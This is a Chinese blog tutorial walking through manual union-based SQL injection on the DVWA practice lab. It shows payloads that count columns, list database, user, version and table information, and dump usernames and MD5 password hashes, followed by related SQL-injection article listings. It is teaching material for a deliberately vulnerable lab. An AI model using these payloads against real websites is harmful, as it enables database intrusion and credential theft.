SQL 注入基础系列1——猜解数据库

最新推荐文章于 2023-02-10 19:58:39 发布
最新推荐文章于 2023-02-10 19:58:39 发布
阅读量2.4k 收藏 16
点赞数 4
分类专栏: shiyanlou 文章标签: sql注入

DVWA.security=low.SQL Injection

后台查询语句:

//后台查询Sql语句是:
SELECT first_name, last_name FROM users WHERE user_id = '$id';

//当user_id输入1时,实际执行的Sql语句是
SELECT first_name, last_name FROM users WHERE user_id = '1';

1、确定数据表列数——1' order by 1# 

//Mysql语法中,#后面的内容会被注释掉
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#;

“order by 1” 指将第一列的数据按升序排列。

order by 1和order by 2都能正常返回数据,当“1' order by 3#”时,返回报错信息:

由此可知,该数据表只有3列。

2、联合查询,获取数据库信息——union select

使用 union 查询时,union左右两侧的查询语句的列数要相同,否则会出错。

  • 获取数据库名称、当前用户 
// 1' union select database(),user()#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user()#`;

  • 获取数据库版本、当前操作系统信息 
//1' union select version(),@@version_compile_os#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#`;

  • 获取dvwa数据库中的表名
//1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#`;

可知,dvwa 数据库有两个数据表,分别是 guestbook 和 users 。

  • 获取用户名、密码——大胆猜测user表的用户名、密码字段分别为:username和password
//1' union select user,password from users#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select username,password from users#`;

哎呀,猜错了~~,可是这个报错信息很给力啊

继续,大胆猜测user表的用户名字段为:user

SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#`;

 

成功爆出用户名、密码。密码采用 md5 进行加密,可以到www.cmd5.com进行解密。

 

 

 

 

 

 

TalkActor
关注
专栏目录
SQL注入简单总结——过滤逗号注入.pdf
04-08
"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的SQL注入情况。在SQL语句中,逗号常用于分隔不同的元素,例如在`UNION`、`LIMIT`等子句中。 1. **过滤逗号的绕过方法**: ...
SQl注入学习
weixin_42451330的博客
06-08 1090
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
mysql路径猜解_猜解数据库(MYSQL)信息
weixin_29266647的博客
02-02 199
1 importrequests23 #################################################################4 #http://43.247.91.228:84/Less-1是靶场地址5 #################################################################67 url1 = "...
SQL注入-布尔盲注】
最新发布
acepanhuan的博客
02-10 1772
学习SQL注入方法之盲注
[DVWA]利用SQL注入漏洞的方法
weixin_45942044的博客
11-22 1031
自学[DVWA]SQL注入漏洞的学习笔记
暑期沉淀web学习——SQL注入基础基础&数字型&字符型)
wang_zui_zui的博客
07-14 681
low1'and'1'='1//判断正确1'and'1'='2//判断错误1'orderby2#//判断数据表的列数#//查看信息泄露的点#//通过泄露点查看数据库的名称#//查询当前数据库里面所有表的名字#//查询users表里面的所有列的名字#group_concat(列名)会把这一列中所有的内容在一行中以,隔开输出。...
DVWA-SQL Injection级别通关详解
m0_60884805的博客
10-11 1294
information_schema 是 mySQL 自带的一张表,这张数据表保存了 MySQL 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。输入到数字3时有了变化,所以此处的select查询语句中查询的字段有2个有2列。
sql注入初学——松风1
08-03
本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 首先,让我们从基础开始。在URL中,如`http://www.example.com/xxx.php?id=4`,如果直接在参数`id`后添加一个单引号 `'`,如`...
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色  sysadmin  ...
SQL注入式攻击下的数据库安全——SQL Server下SQL注入攻击的有效防范.pdf
09-19
本文档详细介绍了在数据库技术与网络技术迅速发展的背景下,数据库安全问题的重要性,特别是SQL注入式攻击的危害及其防范措施。文档首先阐述了数据库应用范围的广泛性以及由此带来的数据安全问题,并通过具体案例...
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
本文档《打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序》针对如何增强ASP等网站程序抵抗SQL注入攻击的能力提供了专业指导。 首先,文档强调了SQL注入攻击的基本原理,即攻击者在用户可输入的...
初学Web安全之sql注入(一)
weixin_47531846的博客
11-17 2435
初学Web安全之sql注入(一) sql注入产生原因 sql注入漏洞的产生需要满足以下两个条件: 参数用户可控 传入的参数拼接到sql语句并且带入到数据库查询 一般来说,用户登录网页所使用的sql语句为: select * from user where username='admin' and password='password'; 而如果程序员设计网页之初没有对用户的输入进行过滤,使得用户的输入可以带入到数据库,那么这时候就可以产生sql注入,最简单的一种,就是构造万能密码,这里拿dvwa来
DVWA之SQL注入(盲注)
天空之蓝的博客
11-17 3490
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA——sql注入
weixin_44743506的博客
08-22 626
原理 将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的 类型 字符型、数字型、搜索型 过程 1、判断是否存在注入注入时字符型还是数字型 2、猜解sql查询语句中的字段数(确定select查出了几列,union前后查询的列数需要一致) 3、确定显示位置(确定在屏幕上显示的结果与select查询列的对应关系,因为某些网页可能会适当调整输出结果的排列顺序,更加美观,但是...
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4337
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
dvwa靶场之sql注入
m0_63314341的博客
02-19 1414
sql注入是指通过分析代码,输入字符达到查找数据库中用户信息的一种行为,会导致用户账户的暴露 接下来我们先来分析一下源代码 SELECT first_name, last_name FROM users WHERE user_id = '$id' 其中重点则是上面的这段代码,这是对于数据库的一段查找代码 当我们为$id这个变量赋值时便会带入这段代码数据库进行查询 ...
burpsuite利用sql注入漏洞猜解数据库名称
u013930899的博客
10-31 1433
burpsuite利用sql注入漏洞猜解数据库
DWVA[SQL-Injection]学习记录
nareku的博客
07-04 421
之前都学不懂SQL注入,学到一半的理论知识 实操也学不会 直接丢下去学其他的了,打打ctf发现很多东西还是和SQL注入沾边的,这不立刻马上加班加点重新捡起来呜呜呜!!! 搭了个DVWA和sqli-labs来辅助学习,先学会手工注入先哈哈哈输入1, 看看回显 可以发现传参是通过GET的方式,先看看后台是怎么执行SQL语句的 即 则执行的SQL语句为: 输入 1’试试 可以发现输入 1和 1’ 得到的页面是不一样的,说明是字符型注入 试试 1’ and 1=1 # (按照Mysql语法,#后面会被注释掉
注入攻击
凉茶铺的博客
07-27 5792
注入攻击是Web安全领域中一种最为常见的攻击方式。XSS本质上也是一种针对HTML的注入攻击。注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能够控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据。解决注入攻击的核心思想“数据与代码分离”原则。...
Python实现SQL注入自动化工具——SQLReveal
SQL注入是网络攻击中常见且危害极大的一种手段,它允许攻击者通过输入恶意SQL代码来获取、修改、删除数据库中的敏感信息,甚至完全控制服务器。随着互联网的普及,这种漏洞的防范和应对变得至关重要。 论文首先深入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值